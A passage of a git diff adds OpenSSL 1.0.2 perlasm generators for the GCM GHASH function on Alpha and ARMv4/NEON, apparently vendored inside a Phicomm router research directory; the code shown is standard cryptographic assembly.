+	srl	$Zlo,4,$Zlo
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	xor	$t0,$Zlo,$Zlo
+	and	$nlo,0xf0,$nhi
+
+	xor	$Tlo1,$Zlo,$Zlo
+	sll	$nlo,4,$nlo
+	xor	$Thi1,$Zhi,$Zhi
+	and	$nlo,0xf0,$nlo
+
+	addq	$nlo,$Htbl,$nlo
+	ldq	$Tlo0,8($nlo)
+	addq	$nhi,$Htbl,$nhi
+	ldq	$Thi0,0($nlo)
+
+.Looplo$N:
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	subq	$cnt,1,$cnt
+	srl	$Zlo,4,$Zlo
+
+	ldq	$Tlo1,8($nhi)
+	xor	$rem,$Zhi,$Zhi
+	ldq	$Thi1,0($nhi)
+	s8addq	$remp,$rem_4bit,$remp
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	xor	$t0,$Zlo,$Zlo
+	extbl	$Xlo,$cnt,$nlo
+
+	and	$nlo,0xf0,$nhi
+	xor	$Thi0,$Zhi,$Zhi
+	xor	$Tlo0,$Zlo,$Zlo
+	sll	$nlo,4,$nlo
+
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	and	$nlo,0xf0,$nlo
+	srl	$Zlo,4,$Zlo
+
+	s8addq	$remp,$rem_4bit,$remp
+	xor	$rem,$Zhi,$Zhi
+	addq	$nlo,$Htbl,$nlo
+	addq	$nhi,$Htbl,$nhi
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	ldq	$Tlo0,8($nlo)
+	xor	$t0,$Zlo,$Zlo
+
+	xor	$Tlo1,$Zlo,$Zlo
+	xor	$Thi1,$Zhi,$Zhi
+	ldq	$Thi0,0($nlo)
+	bne	$cnt,.Looplo$N
+
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	lda	$cnt,7(zero)
+	srl	$Zlo,4,$Zlo
+
+	ldq	$Tlo1,8($nhi)
+	xor	$rem,$Zhi,$Zhi
+	ldq	$Thi1,0($nhi)
+	s8addq	$remp,$rem_4bit,$remp
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	xor	$t0,$Zlo,$Zlo
+	extbl	$Xhi,$cnt,$nlo
+
+	and	$nlo,0xf0,$nhi
+	xor	$Thi0,$Zhi,$Zhi
+	xor	$Tlo0,$Zlo,$Zlo
+	sll	$nlo,4,$nlo
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	and	$nlo,0xf0,$nlo
+	srl	$Zlo,4,$Zlo
+
+	s8addq	$remp,$rem_4bit,$remp
+	xor	$rem,$Zhi,$Zhi
+	addq	$nlo,$Htbl,$nlo
+	addq	$nhi,$Htbl,$nhi
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	ldq	$Tlo0,8($nlo)
+	xor	$t0,$Zlo,$Zlo
+
+	xor	$Tlo1,$Zlo,$Zlo
+	xor	$Thi1,$Zhi,$Zhi
+	ldq	$Thi0,0($nlo)
+	unop
+
+
+.Loophi$N:
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	subq	$cnt,1,$cnt
+	srl	$Zlo,4,$Zlo
+
+	ldq	$Tlo1,8($nhi)
+	xor	$rem,$Zhi,$Zhi
+	ldq	$Thi1,0($nhi)
+	s8addq	$remp,$rem_4bit,$remp
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	xor	$t0,$Zlo,$Zlo
+	extbl	$Xhi,$cnt,$nlo
+
+	and	$nlo,0xf0,$nhi
+	xor	$Thi0,$Zhi,$Zhi
+	xor	$Tlo0,$Zlo,$Zlo
+	sll	$nlo,4,$nlo
+
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	and	$nlo,0xf0,$nlo
+	srl	$Zlo,4,$Zlo
+
+	s8addq	$remp,$rem_4bit,$remp
+	xor	$rem,$Zhi,$Zhi
+	addq	$nlo,$Htbl,$nlo
+	addq	$nhi,$Htbl,$nhi
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	ldq	$Tlo0,8($nlo)
+	xor	$t0,$Zlo,$Zlo
+
+	xor	$Tlo1,$Zlo,$Zlo
+	xor	$Thi1,$Zhi,$Zhi
+	ldq	$Thi0,0($nlo)
+	bne	$cnt,.Loophi$N
+
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	srl	$Zlo,4,$Zlo
+
+	ldq	$Tlo1,8($nhi)
+	xor	$rem,$Zhi,$Zhi
+	ldq	$Thi1,0($nhi)
+	s8addq	$remp,$rem_4bit,$remp
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	xor	$t0,$Zlo,$Zlo
+
+	xor	$Tlo0,$Zlo,$Zlo
+	xor	$Thi0,$Zhi,$Zhi
+
+	and	$Zlo,0x0f,$remp
+	sll	$Zhi,60,$t0
+	srl	$Zlo,4,$Zlo
+
+	s8addq	$remp,$rem_4bit,$remp
+	xor	$rem,$Zhi,$Zhi
+
+	ldq	$rem,0($remp)
+	srl	$Zhi,4,$Zhi
+	xor	$Tlo1,$Zlo,$Zlo
+	xor	$Thi1,$Zhi,$Zhi
+	xor	$t0,$Zlo,$Zlo
+	xor	$rem,$Zhi,$Zhi
+___
+}}
+
+$code=<<___;
+#ifdef __linux__
+#include <asm/regdef.h>
+#else
+#include <asm.h>
+#include <regdef.h>
+#endif
+
+.text
+
+.set	noat
+.set	noreorder
+.globl	gcm_gmult_4bit
+.align	4
+.ent	gcm_gmult_4bit
+gcm_gmult_4bit:
+	.frame	sp,0,ra
+	.prologue 0
+
+	ldq	$Xlo,8($Xi)
+	ldq	$Xhi,0($Xi)
+
+	bsr	$t0,picmeup
+	nop
+___
+
+	&loop();
+
+$code.=<<___;
+	srl	$Zlo,24,$t0	# byte swap
+	srl	$Zlo,8,$t1
+
+	sll	$Zlo,8,$t2
+	sll	$Zlo,24,$Zlo
+	zapnot	$t0,0x11,$t0
+	zapnot	$t1,0x22,$t1
+
+	zapnot	$Zlo,0x88,$Zlo
+	or	$t0,$t1,$t0
+	zapnot	$t2,0x44,$t2
+
+	or	$Zlo,$t0,$Zlo
+	srl	$Zhi,24,$t0
+	srl	$Zhi,8,$t1
+
+	or	$Zlo,$t2,$Zlo
+	sll	$Zhi,8,$t2
+	sll	$Zhi,24,$Zhi
+
+	srl	$Zlo,32,$Xlo
+	sll	$Zlo,32,$Zlo
+
+	zapnot	$t0,0x11,$t0
+	zapnot	$t1,0x22,$t1
+	or	$Zlo,$Xlo,$Xlo
+
+	zapnot	$Zhi,0x88,$Zhi
+	or	$t0,$t1,$t0
+	zapnot	$t2,0x44,$t2
+
+	or	$Zhi,$t0,$Zhi
+	or	$Zhi,$t2,$Zhi
+
+	srl	$Zhi,32,$Xhi
+	sll	$Zhi,32,$Zhi
+
+	or	$Zhi,$Xhi,$Xhi
+	stq	$Xlo,8($Xi)
+	stq	$Xhi,0($Xi)
+
+	ret	(ra)
+.end	gcm_gmult_4bit
+___
+
+$inhi="s0";
+$inlo="s1";
+
+$code.=<<___;
+.globl	gcm_ghash_4bit
+.align	4
+.ent	gcm_ghash_4bit
+gcm_ghash_4bit:
+	lda	sp,-32(sp)
+	stq	ra,0(sp)
+	stq	s0,8(sp)
+	stq	s1,16(sp)
+	.mask	0x04000600,-32
+	.frame	sp,32,ra
+	.prologue 0
+
+	ldq_u	$inhi,0($inp)
+	ldq_u	$Thi0,7($inp)
+	ldq_u	$inlo,8($inp)
+	ldq_u	$Tlo0,15($inp)
+	ldq	$Xhi,0($Xi)
+	ldq	$Xlo,8($Xi)
+
+	bsr	$t0,picmeup
+	nop
+
+.Louter:
+	extql	$inhi,$inp,$inhi
+	extqh	$Thi0,$inp,$Thi0
+	or	$inhi,$Thi0,$inhi
+	lda	$inp,16($inp)
+
+	extql	$inlo,$inp,$inlo
+	extqh	$Tlo0,$inp,$Tlo0
+	or	$inlo,$Tlo0,$inlo
+	subq	$len,16,$len
+
+	xor	$Xlo,$inlo,$Xlo
+	xor	$Xhi,$inhi,$Xhi
+___
+
+	&loop();
+
+$code.=<<___;
+	srl	$Zlo,24,$t0	# byte swap
+	srl	$Zlo,8,$t1
+
+	sll	$Zlo,8,$t2
+	sll	$Zlo,24,$Zlo
+	zapnot	$t0,0x11,$t0
+	zapnot	$t1,0x22,$t1
+
+	zapnot	$Zlo,0x88,$Zlo
+	or	$t0,$t1,$t0
+	zapnot	$t2,0x44,$t2
+
+	or	$Zlo,$t0,$Zlo
+	srl	$Zhi,24,$t0
+	srl	$Zhi,8,$t1
+
+	or	$Zlo,$t2,$Zlo
+	sll	$Zhi,8,$t2
+	sll	$Zhi,24,$Zhi
+
+	srl	$Zlo,32,$Xlo
+	sll	$Zlo,32,$Zlo
+	beq	$len,.Ldone
+
+	zapnot	$t0,0x11,$t0
+	zapnot	$t1,0x22,$t1
+	or	$Zlo,$Xlo,$Xlo
+	ldq_u	$inhi,0($inp)
+
+	zapnot	$Zhi,0x88,$Zhi
+	or	$t0,$t1,$t0
+	zapnot	$t2,0x44,$t2
+	ldq_u	$Thi0,7($inp)
+
+	or	$Zhi,$t0,$Zhi
+	or	$Zhi,$t2,$Zhi
+	ldq_u	$inlo,8($inp)
+	ldq_u	$Tlo0,15($inp)
+
+	srl	$Zhi,32,$Xhi
+	sll	$Zhi,32,$Zhi
+
+	or	$Zhi,$Xhi,$Xhi
+	br	zero,.Louter
+
+.Ldone:
+	zapnot	$t0,0x11,$t0
+	zapnot	$t1,0x22,$t1
+	or	$Zlo,$Xlo,$Xlo
+
+	zapnot	$Zhi,0x88,$Zhi
+	or	$t0,$t1,$t0
+	zapnot	$t2,0x44,$t2
+
+	or	$Zhi,$t0,$Zhi
+	or	$Zhi,$t2,$Zhi
+
+	srl	$Zhi,32,$Xhi
+	sll	$Zhi,32,$Zhi
+
+	or	$Zhi,$Xhi,$Xhi
+
+	stq	$Xlo,8($Xi)
+	stq	$Xhi,0($Xi)
+
+	.set	noreorder
+	/*ldq	ra,0(sp)*/
+	ldq	s0,8(sp)
+	ldq	s1,16(sp)
+	lda	sp,32(sp)
+	ret	(ra)
+.end	gcm_ghash_4bit
+
+.align	4
+.ent	picmeup
+picmeup:
+	.frame	sp,0,$t0
+	.prologue 0
+	br	$rem_4bit,.Lpic
+.Lpic:	lda	$rem_4bit,12($rem_4bit)
+	ret	($t0)
+.end	picmeup
+	nop
+rem_4bit:
+	.long	0,0x0000<<16, 0,0x1C20<<16, 0,0x3840<<16, 0,0x2460<<16
+	.long	0,0x7080<<16, 0,0x6CA0<<16, 0,0x48C0<<16, 0,0x54E0<<16
+	.long	0,0xE100<<16, 0,0xFD20<<16, 0,0xD940<<16, 0,0xC560<<16
+	.long	0,0x9180<<16, 0,0x8DA0<<16, 0,0xA9C0<<16, 0,0xB5E0<<16
+.ascii	"GHASH for Alpha, CRYPTOGAMS by <appro\@openssl.org>"
+.align	4
+
+___
+$output=shift and open STDOUT,">$output";
+print $code;
+close STDOUT;
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-armv4.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-armv4.pl
new file mode 100644
index 0000000..77fbf34
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-armv4.pl
@@ -0,0 +1,493 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# April 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that it
+# uses 256 bytes per-key table [+32 bytes shared table]. There is no
+# experimental performance data available yet. The only approximation
+# that can be made at this point is based on code size. Inner loop is
+# 32 instructions long and on single-issue core should execute in <40
+# cycles. Having verified that gcc 3.4 didn't unroll corresponding
+# loop, this assembler loop body was found to be ~3x smaller than
+# compiler-generated one...
+#
+# July 2010
+#
+# Rescheduling for dual-issue pipeline resulted in 8.5% improvement on
+# Cortex A8 core and ~25 cycles per processed byte (which was observed
+# to be ~3 times faster than gcc-generated code:-)
+#
+# February 2011
+#
+# Profiler-assisted and platform-specific optimization resulted in 7%
+# improvement on Cortex A8 core and ~23.5 cycles per byte.
+#
+# March 2011
+#
+# Add NEON implementation featuring polynomial multiplication, i.e. no
+# lookup tables involved. On Cortex A8 it was measured to process one
+# byte in 15 cycles or 55% faster than integer-only code.
+#
+# April 2014
+#
+# Switch to multiplication algorithm suggested in paper referred
+# below and combine it with reduction algorithm from x86 module.
+# Performance improvement over previous version varies from 65% on
+# Snapdragon S4 to 110% on Cortex A9. In absolute terms Cortex A8
+# processes one byte in 8.45 cycles, A9 - in 10.2, Snapdragon S4 -
+# in 9.33.
+#
+# Câmara, D.; Gouvêa, C. P. L.; López, J. & Dahab, R.: Fast Software
+# Polynomial Multiplication on ARM Processors using the NEON Engine.
+# 
+# http://conradoplg.cryptoland.net/files/2010/12/mocrysen13.pdf
+
+# ====================================================================
+# Note about "528B" variant. In ARM case it makes lesser sense to
+# implement it for following reasons:
+#
+# - performance improvement won't be anywhere near 50%, because 128-
+#   bit shift operation is neatly fused with 128-bit xor here, and
+#   "538B" variant would eliminate only 4-5 instructions out of 32
+#   in the inner loop (meaning that estimated improvement is ~15%);
+# - ARM-based systems are often embedded ones and extra memory
+#   consumption might be unappreciated (for so little improvement);
+#
+# Byte order [in]dependence. =========================================
+#
+# Caller is expected to maintain specific *dword* order in Htable,
+# namely with *least* significant dword of 128-bit value at *lower*
+# address. This differs completely from C code and has everything to
+# do with ldm instruction and order in which dwords are "consumed" by
+# algorithm. *Byte* order within these dwords in turn is whatever
+# *native* byte order on current platform. See gcm128.c for working
+# example...
+
+while (($output=shift) && ($output!~/^\w[\w\-]*\.\w+$/)) {}
+open STDOUT,">$output";
+
+$Xi="r0";	# argument block
+$Htbl="r1";
+$inp="r2";
+$len="r3";
+
+$Zll="r4";	# variables
+$Zlh="r5";
+$Zhl="r6";
+$Zhh="r7";
+$Tll="r8";
+$Tlh="r9";
+$Thl="r10";
+$Thh="r11";
+$nlo="r12";
+################# r13 is stack pointer
+$nhi="r14";
+################# r15 is program counter
+
+$rem_4bit=$inp;	# used in gcm_gmult_4bit
+$cnt=$len;
+
+sub Zsmash() {
+  my $i=12;
+  my @args=@_;
+  for ($Zll,$Zlh,$Zhl,$Zhh) {
+    $code.=<<___;
+#if __ARM_ARCH__>=7 && defined(__ARMEL__)
+	rev	$_,$_
+	str	$_,[$Xi,#$i]
+#elif defined(__ARMEB__)
+	str	$_,[$Xi,#$i]
+#else
+	mov	$Tlh,$_,lsr#8
+	strb	$_,[$Xi,#$i+3]
+	mov	$Thl,$_,lsr#16
+	strb	$Tlh,[$Xi,#$i+2]
+	mov	$Thh,$_,lsr#24
+	strb	$Thl,[$Xi,#$i+1]
+	strb	$Thh,[$Xi,#$i]
+#endif
+___
+    $code.="\t".shift(@args)."\n";
+    $i-=4;
+  }
+}
+
+$code=<<___;
+#include "arm_arch.h"
+
+.text
+.code	32
+
+.type	rem_4bit,%object
+.align	5
+rem_4bit:
+.short	0x0000,0x1C20,0x3840,0x2460
+.short	0x7080,0x6CA0,0x48C0,0x54E0
+.short	0xE100,0xFD20,0xD940,0xC560
+.short	0x9180,0x8DA0,0xA9C0,0xB5E0
+.size	rem_4bit,.-rem_4bit
+
+.type	rem_4bit_get,%function
+rem_4bit_get:
+	sub	$rem_4bit,pc,#8
+	sub	$rem_4bit,$rem_4bit,#32	@ &rem_4bit
+	b	.Lrem_4bit_got
+	nop
+.size	rem_4bit_get,.-rem_4bit_get
+
+.global	gcm_ghash_4bit
+.type	gcm_ghash_4bit,%function
+gcm_ghash_4bit:
+	sub	r12,pc,#8
+	add	$len,$inp,$len		@ $len to point at the end
+	stmdb	sp!,{r3-r11,lr}		@ save $len/end too
+	sub	r12,r12,#48		@ &rem_4bit
+
+	ldmia	r12,{r4-r11}		@ copy rem_4bit ...
+	stmdb	sp!,{r4-r11}		@ ... to stack
+
+	ldrb	$nlo,[$inp,#15]
+	ldrb	$nhi,[$Xi,#15]
+.Louter:
+	eor	$nlo,$nlo,$nhi
+	and	$nhi,$nlo,#0xf0
+	and	$nlo,$nlo,#0x0f
+	mov	$cnt,#14
+
+	add	$Zhh,$Htbl,$nlo,lsl#4
+	ldmia	$Zhh,{$Zll-$Zhh}	@ load Htbl[nlo]
+	add	$Thh,$Htbl,$nhi
+	ldrb	$nlo,[$inp,#14]
+
+	and	$nhi,$Zll,#0xf		@ rem
+	ldmia	$Thh,{$Tll-$Thh}	@ load Htbl[nhi]
+	add	$nhi,$nhi,$nhi
+	eor	$Zll,$Tll,$Zll,lsr#4
+	ldrh	$Tll,[sp,$nhi]		@ rem_4bit[rem]
+	eor	$Zll,$Zll,$Zlh,lsl#28
+	ldrb	$nhi,[$Xi,#14]
+	eor	$Zlh,$Tlh,$Zlh,lsr#4
+	eor	$Zlh,$Zlh,$Zhl,lsl#28
+	eor	$Zhl,$Thl,$Zhl,lsr#4
+	eor	$Zhl,$Zhl,$Zhh,lsl#28
+	eor	$Zhh,$Thh,$Zhh,lsr#4
+	eor	$nlo,$nlo,$nhi
+	and	$nhi,$nlo,#0xf0
+	and	$nlo,$nlo,#0x0f
+	eor	$Zhh,$Zhh,$Tll,lsl#16
+
+.Linner:
+	add	$Thh,$Htbl,$nlo,lsl#4
+	and	$nlo,$Zll,#0xf		@ rem
+	subs	$cnt,$cnt,#1
+	add	$nlo,$nlo,$nlo
+	ldmia	$Thh,{$Tll-$Thh}	@ load Htbl[nlo]
+	eor	$Zll,$Tll,$Zll,lsr#4
+	eor	$Zll,$Zll,$Zlh,lsl#28
+	eor	$Zlh,$Tlh,$Zlh,lsr#4
+	eor	$Zlh,$Zlh,$Zhl,lsl#28
+	ldrh	$Tll,[sp,$nlo]		@ rem_4bit[rem]
+	eor	$Zhl,$Thl,$Zhl,lsr#4
+	ldrplb	$nlo,[$inp,$cnt]
+	eor	$Zhl,$Zhl,$Zhh,lsl#28
+	eor	$Zhh,$Thh,$Zhh,lsr#4
+
+	add	$Thh,$Htbl,$nhi
+	and	$nhi,$Zll,#0xf		@ rem
+	eor	$Zhh,$Zhh,$Tll,lsl#16	@ ^= rem_4bit[rem]
+	add	$nhi,$nhi,$nhi
+	ldmia	$Thh,{$Tll-$Thh}	@ load Htbl[nhi]
+	eor	$Zll,$Tll,$Zll,lsr#4
+	ldrplb	$Tll,[$Xi,$cnt]
+	eor	$Zll,$Zll,$Zlh,lsl#28
+	eor	$Zlh,$Tlh,$Zlh,lsr#4
+	ldrh	$Tlh,[sp,$nhi]
+	eor	$Zlh,$Zlh,$Zhl,lsl#28
+	eor	$Zhl,$Thl,$Zhl,lsr#4
+	eor	$Zhl,$Zhl,$Zhh,lsl#28
+	eorpl	$nlo,$nlo,$Tll
+	eor	$Zhh,$Thh,$Zhh,lsr#4
+	andpl	$nhi,$nlo,#0xf0
+	andpl	$nlo,$nlo,#0x0f
+	eor	$Zhh,$Zhh,$Tlh,lsl#16	@ ^= rem_4bit[rem]
+	bpl	.Linner
+
+	ldr	$len,[sp,#32]		@ re-load $len/end
+	add	$inp,$inp,#16
+	mov	$nhi,$Zll
+___
+	&Zsmash("cmp\t$inp,$len","ldrneb\t$nlo,[$inp,#15]");
+$code.=<<___;
+	bne	.Louter
+
+	add	sp,sp,#36
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r11,pc}
+#else
+	ldmia	sp!,{r4-r11,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	gcm_ghash_4bit,.-gcm_ghash_4bit
+
+.global	gcm_gmult_4bit
+.type	gcm_gmult_4bit,%function
+gcm_gmult_4bit:
+	stmdb	sp!,{r4-r11,lr}
+	ldrb	$nlo,[$Xi,#15]
+	b	rem_4bit_get
+.Lrem_4bit_got:
+	and	$nhi,$nlo,#0xf0
+	and	$nlo,$nlo,#0x0f
+	mov	$cnt,#14
+
+	add	$Zhh,$Htbl,$nlo,lsl#4
+	ldmia	$Zhh,{$Zll-$Zhh}	@ load Htbl[nlo]
+	ldrb	$nlo,[$Xi,#14]
+
+	add	$Thh,$Htbl,$nhi
+	and	$nhi,$Zll,#0xf		@ rem
+	ldmia	$Thh,{$Tll-$Thh}	@ load Htbl[nhi]
+	add	$nhi,$nhi,$nhi
+	eor	$Zll,$Tll,$Zll,lsr#4
+	ldrh	$Tll,[$rem_4bit,$nhi]	@ rem_4bit[rem]
+	eor	$Zll,$Zll,$Zlh,lsl#28
+	eor	$Zlh,$Tlh,$Zlh,lsr#4
+	eor	$Zlh,$Zlh,$Zhl,lsl#28
+	eor	$Zhl,$Thl,$Zhl,lsr#4
+	eor	$Zhl,$Zhl,$Zhh,lsl#28
+	eor	$Zhh,$Thh,$Zhh,lsr#4
+	and	$nhi,$nlo,#0xf0
+	eor	$Zhh,$Zhh,$Tll,lsl#16
+	and	$nlo,$nlo,#0x0f
+
+.Loop:
+	add	$Thh,$Htbl,$nlo,lsl#4
+	and	$nlo,$Zll,#0xf		@ rem
+	subs	$cnt,$cnt,#1
+	add	$nlo,$nlo,$nlo
+	ldmia	$Thh,{$Tll-$Thh}	@ load Htbl[nlo]
+	eor	$Zll,$Tll,$Zll,lsr#4
+	eor	$Zll,$Zll,$Zlh,lsl#28
+	eor	$Zlh,$Tlh,$Zlh,lsr#4
+	eor	$Zlh,$Zlh,$Zhl,lsl#28
+	ldrh	$Tll,[$rem_4bit,$nlo]	@ rem_4bit[rem]
+	eor	$Zhl,$Thl,$Zhl,lsr#4
+	ldrplb	$nlo,[$Xi,$cnt]
+	eor	$Zhl,$Zhl,$Zhh,lsl#28
+	eor	$Zhh,$Thh,$Zhh,lsr#4
+
+	add	$Thh,$Htbl,$nhi
+	and	$nhi,$Zll,#0xf		@ rem
+	eor	$Zhh,$Zhh,$Tll,lsl#16	@ ^= rem_4bit[rem]
+	add	$nhi,$nhi,$nhi
+	ldmia	$Thh,{$Tll-$Thh}	@ load Htbl[nhi]
+	eor	$Zll,$Tll,$Zll,lsr#4
+	eor	$Zll,$Zll,$Zlh,lsl#28
+	eor	$Zlh,$Tlh,$Zlh,lsr#4
+	ldrh	$Tll,[$rem_4bit,$nhi]	@ rem_4bit[rem]
+	eor	$Zlh,$Zlh,$Zhl,lsl#28
+	eor	$Zhl,$Thl,$Zhl,lsr#4
+	eor	$Zhl,$Zhl,$Zhh,lsl#28
+	eor	$Zhh,$Thh,$Zhh,lsr#4
+	andpl	$nhi,$nlo,#0xf0
+	andpl	$nlo,$nlo,#0x0f
+	eor	$Zhh,$Zhh,$Tll,lsl#16	@ ^= rem_4bit[rem]
+	bpl	.Loop
+___
+	&Zsmash();
+$code.=<<___;
+#if __ARM_ARCH__>=5
+	ldmia	sp!,{r4-r11,pc}
+#else
+	ldmia	sp!,{r4-r11,lr}
+	tst	lr,#1
+	moveq	pc,lr			@ be binary compatible with V4, yet
+	bx	lr			@ interoperable with Thumb ISA:-)
+#endif
+.size	gcm_gmult_4bit,.-gcm_gmult_4bit
+___
+{
+my ($Xl,$Xm,$Xh,$IN)=map("q$_",(0..3));
+my ($t0,$t1,$t2,$t3)=map("q$_",(8..12));
+my ($Hlo,$Hhi,$Hhl,$k48,$k32,$k16)=map("d$_",(26..31));
+
+sub clmul64x64 {
+my ($r,$a,$b)=@_;
+$code.=<<___;
+	vext.8		$t0#lo, $a, $a, #1	@ A1
+	vmull.p8	$t0, $t0#lo, $b		@ F = A1*B
+	vext.8		$r#lo, $b, $b, #1	@ B1
+	vmull.p8	$r, $a, $r#lo		@ E = A*B1
+	vext.8		$t1#lo, $a, $a, #2	@ A2
+	vmull.p8	$t1, $t1#lo, $b		@ H = A2*B
+	vext.8		$t3#lo, $b, $b, #2	@ B2
+	vmull.p8	$t3, $a, $t3#lo		@ G = A*B2
+	vext.8		$t2#lo, $a, $a, #3	@ A3
+	veor		$t0, $t0, $r		@ L = E + F
+	vmull.p8	$t2, $t2#lo, $b		@ J = A3*B
+	vext.8		$r#lo, $b, $b, #3	@ B3
+	veor		$t1, $t1, $t3		@ M = G + H
+	vmull.p8	$r, $a, $r#lo		@ I = A*B3
+	veor		$t0#lo, $t0#lo, $t0#hi	@ t0 = (L) (P0 + P1) << 8
+	vand		$t0#hi, $t0#hi, $k48
+	vext.8		$t3#lo, $b, $b, #4	@ B4
+	veor		$t1#lo, $t1#lo, $t1#hi	@ t1 = (M) (P2 + P3) << 16
+	vand		$t1#hi, $t1#hi, $k32
+	vmull.p8	$t3, $a, $t3#lo		@ K = A*B4
+	veor		$t2, $t2, $r		@ N = I + J
+	veor		$t0#lo, $t0#lo, $t0#hi
+	veor		$t1#lo, $t1#lo, $t1#hi
+	veor		$t2#lo, $t2#lo, $t2#hi	@ t2 = (N) (P4 + P5) << 24
+	vand		$t2#hi, $t2#hi, $k16
+	vext.8		$t0, $t0, $t0, #15
+	veor		$t3#lo, $t3#lo, $t3#hi	@ t3 = (K) (P6 + P7) << 32
+	vmov.i64	$t3#hi, #0
+	vext.8		$t1, $t1, $t1, #14
+	veor		$t2#lo, $t2#lo, $t2#hi
+	vmull.p8	$r, $a, $b		@ D = A*B
+	vext.8		$t3, $t3, $t3, #12
+	vext.8		$t2, $t2, $t2, #13
+	veor		$t0, $t0, $t1
+	veor		$t2, $t2, $t3
+	veor		$r, $r, $t0
+	veor		$r, $r, $t2
+___
+}
+
+$code.=<<___;
+#if __ARM_MAX_ARCH__>=7
+.arch	armv7-a
+.fpu	neon
+
+.global	gcm_init_neon
+.type	gcm_init_neon,%function
+.align	4
+gcm_init_neon:
+	vld1.64		$IN#hi,[r1,:64]!	@ load H
+	vmov.i8		$t0,#0xe1
+	vld1.64		$IN#lo,[r1,:64]
+	vshl.i64	$t0#hi,#57
+	vshr.u64	$t0#lo,#63		@ t0=0xc2....01
+	vdup.8		$t1,$IN#hi[7]
+	vshr.u64	$Hlo,$IN#lo,#63
+	vshr.s8		$t1,#7			@ broadcast carry bit
+	vshl.i64	$IN,$IN,#1
+	vand		$t0,$t0,$t1
+	vorr		$IN#hi,$Hlo		@ H<<<=1
+	veor		$IN,$IN,$t0		@ twisted H
+	vstmia		r0,{$IN}
+
+	ret					@ bx lr
+.size	gcm_init_neon,.-gcm_init_neon
+
+.global	gcm_gmult_neon
+.type	gcm_gmult_neon,%function
+.align	4
+gcm_gmult_neon:
+	vld1.64		$IN#hi,[$Xi,:64]!	@ load Xi
+	vld1.64		$IN#lo,[$Xi,:64]!
+	vmov.i64	$k48,#0x0000ffffffffffff
+	vldmia		$Htbl,{$Hlo-$Hhi}	@ load twisted H
+	vmov.i64	$k32,#0x00000000ffffffff
+#ifdef __ARMEL__
+	vrev64.8	$IN,$IN
+#endif
+	vmov.i64	$k16,#0x000000000000ffff
+	veor		$Hhl,$Hlo,$Hhi		@ Karatsuba pre-processing
+	mov		$len,#16
+	b		.Lgmult_neon
+.size	gcm_gmult_neon,.-gcm_gmult_neon
+
+.global	gcm_ghash_neon
+.type	gcm_ghash_neon,%function
+.align	4
+gcm_ghash_neon:
+	vld1.64		$Xl#hi,[$Xi,:64]!	@ load Xi
+	vld1.64		$Xl#lo,[$Xi,:64]!
+	vmov.i64	$k48,#0x0000ffffffffffff
+	vldmia		$Htbl,{$Hlo-$Hhi}	@ load twisted H
+	vmov.i64	$k32,#0x00000000ffffffff
+#ifdef __ARMEL__
+	vrev64.8	$Xl,$Xl
+#endif
+	vmov.i64	$k16,#0x000000000000ffff
+	veor		$Hhl,$Hlo,$Hhi		@ Karatsuba pre-processing
+
+.Loop_neon:
+	vld1.64		$IN#hi,[$inp]!		@ load inp
+	vld1.64		$IN#lo,[$inp]!
+#ifdef __ARMEL__
+	vrev64.8	$IN,$IN
+#endif
+	veor		$IN,$Xl			@ inp^=Xi
+.Lgmult_neon:
+___
+	&clmul64x64	($Xl,$Hlo,"$IN#lo");	# H.lo·Xi.lo
+$code.=<<___;
+	veor		$IN#lo,$IN#lo,$IN#hi	@ Karatsuba pre-processing
+___
+	&clmul64x64	($Xm,$Hhl,"$IN#lo");	# (H.lo+H.hi)·(Xi.lo+Xi.hi)
+	&clmul64x64	($Xh,$Hhi,"$IN#hi");	# H.hi·Xi.hi
+$code.=<<___;
+	veor		$Xm,$Xm,$Xl		@ Karatsuba post-processing
+	veor		$Xm,$Xm,$Xh
+	veor		$Xl#hi,$Xl#hi,$Xm#lo
+	veor		$Xh#lo,$Xh#lo,$Xm#hi	@ Xh|Xl - 256-bit result
+
+	@ equivalent of reduction_avx from ghash-x86_64.pl
+	vshl.i64	$t1,$Xl,#57		@ 1st phase
+	vshl.i64	$t2,$Xl,#62
+	veor		$t2,$t2,$t1		@
+	vshl.i64	$t1,$Xl,#63
+	veor		$t2, $t2, $t1		@
+ 	veor		$Xl#hi,$Xl#hi,$t2#lo	@
+	veor		$Xh#lo,$Xh#lo,$t2#hi
+
+	vshr.u64	$t2,$Xl,#1		@ 2nd phase
+	veor		$Xh,$Xh,$Xl
+	veor		$Xl,$Xl,$t2		@
+	vshr.u64	$t2,$t2,#6
+	vshr.u64	$Xl,$Xl,#1		@
+	veor		$Xl,$Xl,$Xh		@
+	veor		$Xl,$Xl,$t2		@
+
+	subs		$len,#16
+	bne		.Loop_neon
